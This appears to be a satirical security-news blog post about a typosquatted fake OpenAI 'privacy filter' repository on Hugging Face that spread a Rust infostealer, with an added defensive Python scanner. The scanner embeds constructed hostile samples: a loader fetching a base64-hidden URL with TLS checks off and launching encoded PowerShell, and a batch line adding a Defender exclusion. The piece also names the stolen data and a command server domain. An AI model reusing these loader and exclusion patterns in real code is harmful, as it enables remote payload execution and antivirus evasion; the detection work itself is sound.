A Fake OpenAI ‘Privacy Filter’ Hit Number One on Hugging Face With 244,000 Downloads — It Was a Rust-Based Infostealer Wearing a Lab Coat

🤚 The Open-Palm Trending Page

A malicious repository called Open-OSS/privacy-filter spent enough time at the #1 trending spot on Hugging Face to accumulate 244,000 downloads before anyone noticed it was, in fact, not affiliated with OpenAI and was instead delivering a sophisticated Rust-based infostealer to everyone who installed it.

Security researchers at HiddenLayer discovered the campaign on May 7, by which point the repo had already achieved what most legitimate AI researchers spend months trying to accomplish: viral distribution. The attackers used a classic typosquatting technique — naming the project just close enough to OpenAI’s actual work that the average developer’s pattern-matching brain filled in the rest. Because who wouldn’t trust a privacy filter from the company that trained GPT on the entire internet?

The attack chain was a masterclass in layered deception:

  • A malicious loader.py padded with legitimate-looking model-loading code so a skim reads as ordinary AI glue
  • TLS certificate verification disabled on the outbound request (a red flag the size of a billboard, routinely ignored)
  • URLs hidden as base64 strings and decoded at runtime, fetching JSON payloads that carry PowerShell commands
  • A batch file performing privilege escalation and adding the malware to Microsoft Defender’s exclusion list — because the best hiding spot is the one you ask Windows to create for you
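If you pull a trending repo and want to check it before anything in it runs, the four traits above are all visible statically. The script below is an added example for this page, not HiddenLayer's tooling and not code from the repository in question: it walks a downloaded repo's files and flags TLS verification turned off, base64 literals that decode to URLs, PowerShell or cmd spawned from Python, and Defender exclusions added from a batch file. The file names, the sample loader and the sample batch file are constructed for the example and are never executed, only parsed.

```python
"""Static triage of a downloaded Hugging Face repository for the loader traits
listed above. Added example; not HiddenLayer's tooling. SAMPLE_LOADER and
SAMPLE_BATCH are constructed inputs and are parsed, never run."""
import ast
import base64
import re
from typing import Dict, List

# Constructed sample in the shape described: model-loading glue, verify=False,
# a base64 string that decodes to a URL, and PowerShell spawned via subprocess.
ENCODED_URL = base64.b64encode(b"https://example.invalid/config.json").decode()
SAMPLE_LOADER = '''
import base64, json, requests, subprocess

def load_model(name):
    cfg = requests.get(base64.b64decode("__B64__").decode(), verify=False).json()
    subprocess.run(["powershell", "-enc", cfg["stage"]], capture_output=True)
    return name
'''.replace("__B64__", ENCODED_URL)

# Constructed batch file carving out a Defender exclusion before starting a binary.
SAMPLE_BATCH = r'''@echo off
powershell -Command "Add-MpPreference -ExclusionPath '%APPDATA%\updater'"
start "" "%APPDATA%\updater\svc.exe"
'''

SAMPLE_REPO = {"loader.py": SAMPLE_LOADER, "setup.bat": SAMPLE_BATCH}

SHELL_RE = re.compile(r"(?i)\b(powershell|pwsh|cmd(\.exe)?)\b|\.bat\b")
EXCLUSION_RE = re.compile(r"(?i)\bAdd-MpPreference\b[^\n]*-Exclusion")


def _dotted(node: ast.AST) -> str:
    """Render a call target such as base64.b64decode as a dotted name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def _decode_url(s: str):
    """Return the decoded text if s is base64 for an http(s) URL, else None."""
    try:
        decoded = base64.b64decode(s, validate=True).decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError are subclasses
        return None
    return decoded if re.match(r"https?://", decoded) else None


def scan_python(src: str, path: str) -> List[Dict[str, object]]:
    """AST-level checks: no regex over source text, so string tricks don't hide calls."""
    found = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Attribute) and _dotted(node) == "ssl._create_unverified_context":
            found.append({"file": path, "line": node.lineno, "kind": "tls_verify_disabled",
                          "detail": "ssl._create_unverified_context"})
        if not isinstance(node, ast.Call):
            continue
        target = _dotted(node.func)
        for kw in node.keywords:  # requests-style verify=False
            if kw.arg == "verify" and isinstance(kw.value, ast.Constant) and kw.value.value is False:
                found.append({"file": path, "line": node.lineno, "kind": "tls_verify_disabled",
                              "detail": f"{target}(verify=False)"})
        if target.endswith("b64decode") and node.args and isinstance(node.args[0], ast.Constant) \
                and isinstance(node.args[0].value, str):
            url = _decode_url(node.args[0].value)
            if url:  # surface the hidden URL so an analyst can pivot on it
                found.append({"file": path, "line": node.lineno, "kind": "base64_url", "detail": url})
        if target.startswith(("subprocess.", "os.system", "os.popen")):
            literals = [c.value for a in node.args for c in ast.walk(a)
                        if isinstance(c, ast.Constant) and isinstance(c.value, str)]
            hit = next((lit for lit in literals if SHELL_RE.search(lit)), None)
            if hit:
                found.append({"file": path, "line": node.lineno, "kind": "shell_spawn",
                              "detail": f"{target} -> {hit}"})
    return found


def scan_text(text: str, path: str) -> List[Dict[str, object]]:
    """Line-level check for Defender exclusions, for .bat/.ps1 files and string literals."""
    return [{"file": path, "line": i, "kind": "defender_exclusion", "detail": line.strip()}
            for i, line in enumerate(text.splitlines(), 1) if EXCLUSION_RE.search(line)]


def scan_repo(files: Dict[str, str]) -> List[Dict[str, object]]:
    """files maps relative path -> content, e.g. read from a fresh snapshot_download."""
    found = []
    for path, content in files.items():
        if path.endswith(".py"):
            try:
                found.extend(scan_python(content, path))
            except SyntaxError as exc:  # a .py that isn't Python is itself worth a look
                found.append({"file": path, "line": exc.lineno or 0, "kind": "parse_error",
                              "detail": str(exc)})
        found.extend(scan_text(content, path))
    return found


if __name__ == "__main__":
    for f in scan_repo(SAMPLE_REPO):
        print(f"{f['file']}:{f['line']} {f['kind']}: {f['detail']}")
```

Run it over the directory a `snapshot_download` produced before importing anything from it; a single `tls_verify_disabled` hit in a file named like model-loading glue is reason enough to stop, and the decoded `base64_url` gives you the thing to block and hunt for. The AST approach matters because the loader's whole trick is looking like boring code: a regex over source text misses `verify=False` split across lines or a URL assembled from a decode call, while the parse tree does not.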

👐 The Two-Handed Credential Harvest

The final payload — a Rust-based infostealer — went after everything: browser credentials, Discord tokens, cryptocurrency wallets, SSH keys, FTP credentials, VPN configurations, and system information. All of it was exfiltrated to a command-and-control server at recargapopular[.]com, a domain name that sounds less like a cybercrime operation and more like a Latin American phone top-up service.

The malware also included anti-analysis features that checked for virtual machines, sandboxes, debuggers, and analysis tools — the digital equivalent of a burglar who checks for cameras before entering but somehow forgot that 244,000 people watched him walk in through the front door.

HiddenLayer linked the infrastructure to other malicious repositories and an npm typosquatting campaign distributing the WinOS 4.0 implant, suggesting this wasn’t an isolated incident but rather one node in a broader supply chain compromise operation. Users who installed the package were advised to reimage their entire systems and rotate all credentials — the cybersecurity equivalent of “burn the house down and start over.”

🌿 The Gentle Awakening

There is something philosophically perfect about a fake privacy filter being the vehicle for stealing all your private data. It’s the kind of irony that would make Alanis Morissette finally have an actual example of irony.

Hugging Face has become the npm of machine learning — an open platform where anyone can upload anything, wrapped in the implicit trust that comes from community curation. But “community curation” in practice means “the trending algorithm decided this was popular, and popularity equals legitimacy.” The same discovery mechanism that helps researchers find genuine breakthroughs also laundered a credential-stealing operation to a quarter-million installations.

The download count itself may have been artificially inflated, which raises an even more unsettling question: the attackers understood that perceived popularity is a security vulnerability. They didn’t need to hack Hugging Face. They just needed to hack the concept of social proof.

👑 The Gold-Leaf Platform Reckoning

This incident arrives at a moment when every major AI platform is racing to become the default repository for models, datasets, and tools. Hugging Face, GitHub, npm, PyPI — they’re all competing for the same prize: being the place developers go first. And the place developers go first is, by definition, the place attackers go first.

The AI supply chain is now a supply chain in the traditional software security sense, complete with all the trust assumptions, dependency confusion, and typosquatting vulnerabilities that have plagued package managers for a decade. The only difference is that AI repositories carry an additional layer of implicit authority — if something is trending on Hugging Face, it must be good, because AI is complicated and surely someone would have noticed if it were malicious.

Nobody noticed. For 244,000 downloads, nobody noticed.

“The model performed exceptionally well on all benchmarks, especially the ones measuring how quickly it could exfiltrate your SSH keys to a domain registered three days ago.” — The Slap of Wisdom Threat Intelligence Desk, currently rotating credentials for the fourth time this quarter